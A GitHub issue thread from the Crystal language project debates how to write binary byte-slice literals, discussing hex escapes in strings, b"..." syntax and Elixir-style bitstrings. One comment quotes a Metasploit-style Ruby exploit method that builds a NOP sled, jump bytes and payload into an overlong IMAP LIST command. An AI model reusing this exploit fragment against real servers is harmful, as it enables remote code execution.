Literals for Slice(UInt8) #2886

asterite · 2016-06-21T12:00:41Z

We need a way to express binary data embedded in the data section of the program. We can do this right now for strings, but there's no way to create a non-UTF8 string with a string literal.

There are several ways we can fix this:

We can add back the \x... escape to string literals, to add a byte with a specific hexadecimal value. Right now strings can hold non-UTF8 data, they just raise when using those strings as UTF-8 data (for example, iterating them), so it's strange that they can hold non-UTF8 data but one can't create them with a literal. From there, one could take a slice. This will also solve Remove macro methods from the language #2565 because inspecting a string with non-valid codepoints will output \x... for those values.
We add a literal for something like a Slice(UInt8). It could just be Slice(UInt8), but these are not read-only. Or maybe they can be read-only and they can crash the program when written. One shouldn't write them, the same way as one doesn't get a slice from a string literal and writes to it. There was the idea of introducing const [...] for this, with which we could create static data for any kind of integer value.
Other options...?

This doesn't have a big priority right now, but I'm leaving it here so there's a place to discuss this.

The text was updated successfully, but these errors were encountered:

jhass · 2016-06-21T12:53:35Z

I would tend towards 2 with something like #2791 (comment) as the preferred alternative. Either way we need to make sure to not run into issues similar to #2485.

ysbaddaden · 2016-06-21T13:35:35Z

Same here: Slice(UInt8) is the de-facto type for binary data whereas String may only contain UTF-8 data. I don't think it's a good idea to push the idea that it's okay to put arbitrary bytes into a String.

inspecting a string with non-valid codepoints will output \x... for those values

But I like that.

asterite · 2016-06-21T13:43:30Z

One issue we found the other day is that we needed to do a POST in the http client with binary data. We made it work by simply creating a String with that data and then invoking HTTP::Client.post. I think I like that, it's pretty convenient. Otherwise we'd need to add overloads or restrictions for Slice(UInt8), and HTTP::Request will have the body as String | Slice(UInt8), etc.

To compare with other statically typed languaged, Go's strings are also just byte chunks that can hold arbitrary bytes, but can also be treated as UTF-8 strings when needed: https://blog.golang.org/strings

Java's String class is supposed to be UTF-16, but can hold arbitrary bytes as well.

jhass · 2016-06-21T13:56:05Z

I very much like that String is supposed to handle UTF-8 valid data and operations on that. And nothing else. I would hate to loose that property and rather prefer convenience API added to other interfaces for handling Slice(UInt8). In the HTTP example binary data would need some form of content encoding to valid ASCII values anyway. Detecting to do that encoding automatically upon receiving a Slice(UInt8) vs a String seems actually easier than always second guessing whether String needs it or not.

bcardiff · 2016-06-21T14:57:24Z

I am with @jhass here. I would keep String as valid UTF-8.

I would rather add overloads in the http client to send/receive blobs.
And I definitely want to be able to embed binary resources (Slice or StaticArray and then a convenient api to wrap it)

mperham · 2016-06-21T18:15:44Z

Would it be helpful or more performant to have Base64.decode(str, io) : Nil so I can decode the asset and stream it out with the response?

asterite · 2016-06-21T18:44:55Z

@mperham Good idea, an overload that writes directly to an IO is missing. Should be easy to add.

mperham · 2016-06-21T18:48:31Z

Just a side note, I'm trying to write the Slice(UInt8) out to the Kemal response:

    def self.serve(filename, resp)
      resp.status_code = 200
      resp.write Base64.decode(WEB_ASSETS[filename])
    end

I verified that the Slice size is exactly the same size as the file on disk but the response only has about half the expected bytes. Anyone know why the server response is not writing the entire Slice to the client?

asterite · 2016-06-21T19:04:57Z

@mperham we'd probably need a concrete code that we can reproduce to check if something works wrong. I tried creating a slice of 5000~50000 bytes and it works well.

mperham · 2016-06-21T19:36:13Z

Looks like the problem is related to me not setting the content-type header. The browser prints out the PNG contents as text/html but serves it correctly when I set it to "application/octet-stream".

ozra · 2016-06-22T16:22:57Z

Just throwing thoughts in to the mixture here: How about a literal that generates a View(UInt8) which would be a read only type derived from Slice(UInt8)? If it's known at compile time an area is unwritable, we should be helped at compile time, avoiding a crash where possible.

david50407 · 2016-07-15T18:06:36Z

How about provide users to create their own literal types (maybe in %data{ ... } format, data can be any words for each type, and {} can be [] or ()) like C++11 does?

Then we can create some custom literals for Slice(UInt8), StaticArray(UInt8) or other types we want? (use macro to define these works in compile-time, maybe?)

maxpowa · 2016-12-15T23:02:05Z

Any progress on this? Usecase in my scenario is writing bytes to an IO, as one might do when using low level packets on the wire. io.write_bytes(0x00000000, IO::ByteFormat::BigEndian) doesn't provide 4 empty bytes as one might expect, but rather outputs a single empty byte.

JacobUb · 2016-12-16T07:47:00Z

@maxpowa
It works for me 😕

io = IO::Memory.new
io.write UInt8.slice(1, 1, 1, 1, 1, 1, 1, 1)
io.rewind
io.write_bytes(0x00000000, IO::ByteFormat::BigEndian)
io.to_slice # Bytes[0, 0, 0, 0, 1, 1, 1, 1]

maxpowa · 2016-12-16T16:17:33Z

Yep nevermind, it is indeed working... I must have done something wrong when I was testing. Thanks @exilor

oprypin · 2017-07-10T21:27:09Z

We can add back the \x... escape to string literals

This has been implemented in cd8296b, by the way.

I think it's a really bad idea to allow broken string literals in the language's core syntax. I noticed that some people are already doing hideous things with it, without really understanding the situation...
This should only be possible through an unsafe operation.

The alternative solution is the way to go. Bytes literals should definitely be a thing.

And "\xff" syntax should give an explicit error like "strings are for UTF-8 encoded text, not for arbitrary bytes".

Side note: in Python "\x**" means "\u{**}", but they do have bytes literals where it means what you'd expect: b'\xff'

bararchy · 2017-07-11T08:10:54Z

@oprypin but sometimes people need to do hideous things for hideous causes :)
this feature is important, it's heavily relaid on in fuzzers and exploit development (yes FFS using Crystal ! :) )
https://www.offensive-security.com/metasploit-unleashed/shell/

 def exploit
        connected = connect_login
        nopes = "\x90"*(payload_space-payload.encoded.length) # to be fixed with make_nops()
        sjump = "\xEB\xF9\x90\x90"     # Jmp Back
        njump = "\xE9\xDD\xD7\xFF\xFF" # And Back Again Baby  ;)         
        evil = nopes + payload.encoded + njump + sjump + [target.ret].pack("A3")
        print_status("Sending payload")
        sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
        sock.put(sploit)
        handler
        disconnect
    end

etc....

RX14 · 2017-07-11T08:28:28Z

It's still easy enough to construct a string with invalid data, I just don't think it should be part of the syntax.

oprypin · 2017-07-11T08:41:22Z

@bararchy, thanks for a good demonstration of the point I was making... All of these should have been Bytes

oprypin · 2017-09-26T20:29:18Z

I forgot that this issue existed and just started writing a new one.
Anyway... I'm just still appalled that there's a literal for invalid strings.

So, ping

Putting bytes literals in read-only data is a must-have, and so if the literal produces a writable Slice(UInt8), that's a problem. Or it used to be, not anymore! Now we even have read-only slices.
So there are really no blockers now.

asterite · 2017-09-26T20:47:37Z

Right now this is solved because one can use a String for this, because a String can now have arbitrary bytes.

I know it's not the most elegant solution, but for now it works. We can postpone a real solution for this for later.

oprypin · 2017-09-26T20:48:27Z

pls

asterite · 2017-09-26T20:54:08Z

What if we add:

b"some content"

For now that would be equivalent to:

"some content".to_slice

and of course you can use \xAB for specific byte values.

We could also have:

b'x'

to be the same as 'x'.ord.to_u8 and not have it compile if it doesn't fit in an UInt8, so that would be a byte literal.

I think Rust uses the same notation.

oprypin · 2017-09-26T20:58:39Z

My suggestion that I started to write:

It would be a literal that does not allow \u escapes, and allows only ASCII characters, supplemented by the \xff syntax for arbitrary bytes. The literal would produce Slice(UInt8).

I propose the syntax b"foo\x12fsdfg", like in Python and Rust.

Side note, Bytes[] macro probably should be rewritten to produce a literal.

I would also suggest removing the hexadecimal notation from strings. Obviously, to replace the use case, the bytes literal would need to store the data in the read-only data section. I don't know whether that means that the size of the slice would need to be moved there as well, like it is with strings.

"some content".to_slice is impossible to do if hexadecimal escapes are removed from strings, which is the main problem I have

asterite · 2017-09-26T21:04:06Z

Oh, with "some content".to_slice I meant it would be equivalent to that. We could probably type b"hello" as a read-only Slice(UInt8) and put that in the ROM section of the program.

For that we'll probably need Slice to be part of the known types for the compiler, and have @pointer, @size and @read_only laid out accordingly in memory.

But for now I'd leave the ability to have \x.. escape sequences in a String. Later we can remove them, but we'll have to make sure that there's no way to create strings that are not valid in UTF-8. Maybe that will slow down everything a bit, but, well, correct code is better than fast code.

oprypin · 2017-09-26T21:10:12Z

@pointer, @size and @read_only could be directly followed by the data itself, with @pointer being equal to its own address + offset.

I don't think it's that important to prevent strings that are not valid UTF-8. The only way to create them is String.new(bytes or pointer), just raise the awareness. The problem is that people see nothing wrong with '\x' string literals and then intentionally seek out a way to recreate such strings "programmatically".

RX14 · 2017-10-06T17:57:09Z

@asterite We wouldn't need to know about Slice's internal layout, unlike String, because we can simply define that Slice needs to have a constructor taking a pointer and a size (which we already have). We only need to know String's layout because we put the data contiguously. With Slice we don't need to do that. And it's probably not worth doing it since it's a struct and LLVM will optimize since both the constructor arguments are literals.

oprypin · 2017-10-06T18:04:17Z

@RX14, are you sure you understand the part about putting this in read-only data section?

RX14 · 2017-10-06T20:25:22Z

@oprypin yes.... you pass a pointer to the data in the RO section to the slice contructor. The slice instance itself has to live on the stack anyway, so can't be in ROdata.

oprypin · 2018-05-28T13:48:46Z

@RX14 Please reopen this

straight-shoota · 2018-05-29T10:06:24Z

Why was this even closed and all those other issues which are most definitely not fixed?

HertzDevil · 2022-06-15T16:23:59Z

I would go one step further and use a completely new syntax similar to Elixir's bitstrings, rather than simply borrowing the one for string literals:

<<0x12>>             # => <<0x12>>
<<0x21>>             # => "!"
<<0xCF, 0x83>>       # => "σ"
"\xCF\x83"           # => "σ"
<<0x12, 0xCF, 0x83>> # => <<0x12, 0xCF, 0x83>>
"\x12\xCF\x83"       # => <<0x12, 0xCF, 0x83>>
<<0x12, "σ">>        # => <<0x12, 0xCF, 0x83>>

(Every double-quoted string literal in Elixir denotes a bitstring. Single-quoted ones produce charlists.)

An attractive feature about them is they can handle multibyte sequences:

<<0x12345678::32>>        # => <<18, 52, 86, 120>>
<<0x12345678::32-little>> # => <<18, 52, 86, 120>>

<<1.0::little>>    # => <<0, 0, 0, 0, 0, 0, 240, 63>>
<<1.0::32-little>> # => <<0, 0, 128, 63>>

<<0xCF83::16>>        # => "σ"
<<0x83CF::16-little>> # => "σ"
<<"σ"::utf8>>         # => "σ"
<<"σ"::utf16-little>> # => <<195, 3>>
<<0x03C3::utf8>>      # => "σ"
<<0x03C3::utf16-big>> # => <<3, 195>>

It emphasizes the fact that byte arrays are a more general concept than string-like byte sequences.

It is important that both the Bytes itself and the data it refers to are stored in read-only memory; the Slice constructor that accepts a pointer is unsafe, so the data must be encapsulated behind a read-only Bytes, with no other way to access it.

If we have an extremely fast String#valid_encoding?, say even faster than #each_char(&), then the performance penalties should be very minimal. So as a starter I think we should incorporate one of the algorithms in #11873. (In fact, the standard library has never used that method since its introduction.)

philipp-kempgen · 2024-03-27T00:02:30Z

Just to throw yet another an idea in:
Ruby has the .b method for strings.
https://docs.ruby-lang.org/en/3.2/String.html#method-i-b
Maybe "bytestring\x00\x01".b could be treated as a byteslice literal in Crystal?
(I prefer to say "a ByteSlice" rather than "a Bytes".)

Ruby also has ?… for character literals (or rather single-character strings), even supporting control characters.
https://docs.ruby-lang.org/en/3.2/syntax/literals_rdoc.html#label-Strings

?\C-g == ?\a  # => true

Then again, b"…" and b'…' or Elixir bitstrings are probably better, if they could maybe use b(…) or b[…] or %b(…) instead of <<…>>, provided they let you write things like:

b( "filemagic", 0x01, 0x02, '\a', '\C-g' )

asterite added RFC topic:compiler status:draft labels Jun 21, 2016

spalladino added status:draft and removed status:draft RFC labels Jan 9, 2017

straight-shoota mentioned this issue Oct 4, 2017

Parser: add missing escape sequence for Char #5075

Closed

straight-shoota mentioned this issue Oct 6, 2017

Use byte encoding as Crystal string instead of Base64 schovi/baked_file_system#12

Merged

straight-shoota mentioned this issue Nov 9, 2017

Asset/Resource embedding? #1649

Open

asterite closed this as completed May 28, 2018

RX14 reopened this May 29, 2018

jhass mentioned this issue May 29, 2020

[RFC]Qt like File and Path interface for embed resources #9374

Open

kimburgess mentioned this issue Oct 15, 2020

CharLiteral#ord / binary char syntax #9830

Closed

wolfgang371 mentioned this issue Dec 22, 2020

Crystal String behaves inconsistent (and can cause compile time errors) #10132

Closed

straight-shoota mentioned this issue Mar 19, 2021

Disallow surrogate halves in escape sequences of string and character literals #10443

Merged

straight-shoota mentioned this issue Jul 13, 2021

Unicode tables as constants #4516

Closed

straight-shoota mentioned this issue Sep 30, 2021

Support '\xXX' notation for Chars #11260

Closed

straight-shoota mentioned this issue Feb 10, 2022

Reading or writing a binary file with Bytes #11586

Closed

HertzDevil mentioned this issue Jul 29, 2023

Experimental: Add Slice.literal for numeric slice constants #13716

Merged

HertzDevil mentioned this issue Jun 1, 2024

Hex Array Literals #14654

Closed

straight-shoota mentioned this issue Jun 6, 2024

UTF-16 string literals #14670

Closed

HertzDevil mentioned this issue Jul 4, 2024

Ambiguity between sigils and macro fresh variables #14782

Open

HertzDevil mentioned this issue Sep 18, 2024

Reusing AST nodes in macro #each #15008

Open

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Literals for Slice(UInt8) #2886

Literals for Slice(UInt8) #2886

asterite commented Jun 21, 2016

jhass commented Jun 21, 2016

ysbaddaden commented Jun 21, 2016

asterite commented Jun 21, 2016

jhass commented Jun 21, 2016

bcardiff commented Jun 21, 2016

mperham commented Jun 21, 2016 •

edited

Loading

asterite commented Jun 21, 2016

mperham commented Jun 21, 2016

asterite commented Jun 21, 2016

mperham commented Jun 21, 2016

ozra commented Jun 22, 2016

david50407 commented Jul 15, 2016

maxpowa commented Dec 15, 2016 •

edited

Loading

JacobUb commented Dec 16, 2016

maxpowa commented Dec 16, 2016

oprypin commented Jul 10, 2017 •

edited

Loading

bararchy commented Jul 11, 2017

RX14 commented Jul 11, 2017

oprypin commented Jul 11, 2017

oprypin commented Sep 26, 2017

asterite commented Sep 26, 2017 •

edited

Loading

oprypin commented Sep 26, 2017

asterite commented Sep 26, 2017 •

edited

Loading

oprypin commented Sep 26, 2017

asterite commented Sep 26, 2017

oprypin commented Sep 26, 2017 •

edited

Loading

RX14 commented Oct 6, 2017

oprypin commented Oct 6, 2017

RX14 commented Oct 6, 2017

oprypin commented May 28, 2018

straight-shoota commented May 29, 2018

HertzDevil commented Jun 15, 2022

philipp-kempgen commented Mar 27, 2024

Literals for Slice(UInt8) #2886

Literals for Slice(UInt8) #2886

Comments

asterite commented Jun 21, 2016

jhass commented Jun 21, 2016

ysbaddaden commented Jun 21, 2016

asterite commented Jun 21, 2016

jhass commented Jun 21, 2016

bcardiff commented Jun 21, 2016

mperham commented Jun 21, 2016 • edited Loading

asterite commented Jun 21, 2016

mperham commented Jun 21, 2016

asterite commented Jun 21, 2016

mperham commented Jun 21, 2016

ozra commented Jun 22, 2016

david50407 commented Jul 15, 2016

maxpowa commented Dec 15, 2016 • edited Loading

JacobUb commented Dec 16, 2016

maxpowa commented Dec 16, 2016

oprypin commented Jul 10, 2017 • edited Loading

bararchy commented Jul 11, 2017

RX14 commented Jul 11, 2017

oprypin commented Jul 11, 2017

oprypin commented Sep 26, 2017

asterite commented Sep 26, 2017 • edited Loading

oprypin commented Sep 26, 2017

asterite commented Sep 26, 2017 • edited Loading

oprypin commented Sep 26, 2017

asterite commented Sep 26, 2017

oprypin commented Sep 26, 2017 • edited Loading

RX14 commented Oct 6, 2017

oprypin commented Oct 6, 2017

RX14 commented Oct 6, 2017

oprypin commented May 28, 2018

straight-shoota commented May 29, 2018

HertzDevil commented Jun 15, 2022

philipp-kempgen commented Mar 27, 2024

mperham commented Jun 21, 2016 •

edited

Loading

maxpowa commented Dec 15, 2016 •

edited

Loading

oprypin commented Jul 10, 2017 •

edited

Loading

asterite commented Sep 26, 2017 •

edited

Loading

asterite commented Sep 26, 2017 •

edited

Loading

oprypin commented Sep 26, 2017 •

edited

Loading